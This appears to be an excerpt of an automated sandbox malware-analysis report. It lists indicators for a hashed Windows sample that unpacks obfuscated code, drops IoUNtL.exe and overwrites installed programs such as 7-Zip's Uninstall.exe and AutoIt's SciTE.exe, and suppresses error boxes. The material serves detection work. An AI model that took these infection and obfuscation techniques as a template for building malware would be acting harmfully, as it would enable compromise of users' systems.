        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.ServiceModel.pdbu source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeUnpacked PE file: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;u:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeUnpacked PE file: 1.2.IoUNtL.exe.f40000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeUnpacked PE file: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
        Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
        Source: initial sampleStatic PE information: section where entry point is pointing to: u
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeStatic PE information: section name: u
        Source: IoUNtL.exe.0.drStatic PE information: section name: .aspack
        Source: IoUNtL.exe.0.drStatic PE information: section name: .adata
        Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
        Source: MyProg.exe.1.drStatic PE information: section name: PELIB
        Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
        Source: SciTE.exe.1.drStatic PE information: section name: u
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0041C40C push cs; iretd 0_2_0041C4E2
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_00423149 push eax; ret 0_2_00423179
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0041C50E push cs; iretd 0_2_0041C4E2
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_004231C8 push eax; ret 0_2_00423179
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0040E21D push ecx; ret 0_2_0040E230
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0041C6BE push ebx; ret 0_2_0041C6BF
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0062C10E push ebx; ret 0_2_0062C10F
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0061E46D push ecx; ret 0_2_0061E480
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0062BE5C push cs; iretd 0_2_0062BF32
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0062BF5E push cs; iretd 0_2_0062BF32
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_006938C5 push ecx; iretd 0_2_006938C8
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_00690A87 push FFFFFFE1h; ret 0_2_00690A96
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_006939D2 push edi; retf 0_2_006939D3
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_021D62D0 push ds; iretd 0_2_021D62DF
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_021D52CC push es; iretd 0_2_021D52CF
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_060644A0 pushfd ; iretd 0_2_06064789
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_06064852 push es; ret 0_2_06064860
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_060657D0 push 0C0603D8h; retf 0_2_0606582D
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_060A78B0 push es; ret 0_2_060A78C0
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeCode function: 1_2_00F46076 push 00F414E1h; ret 1_2_00F46425
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeCode function: 1_2_00F41638 push dword ptr [00F43084h]; ret 1_2_00F4170E
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeCode function: 1_2_00F42D9B push ecx; ret 1_2_00F42DAB
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeCode function: 1_2_00F4600A push ebp; ret 1_2_00F4600D
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeStatic PE information: section name: u entropy: 6.934487792037011
        Source: IoUNtL.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
        Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.935083153445225
        Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.934720431366084
        Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.933665407742621
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
        Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
        Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeFile created: C:\Users\user\AppData\Local\Temp\IoUNtL.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 799
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeMemory allocated: 21D0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeMemory allocated: 2600000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeMemory allocated: 2400000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
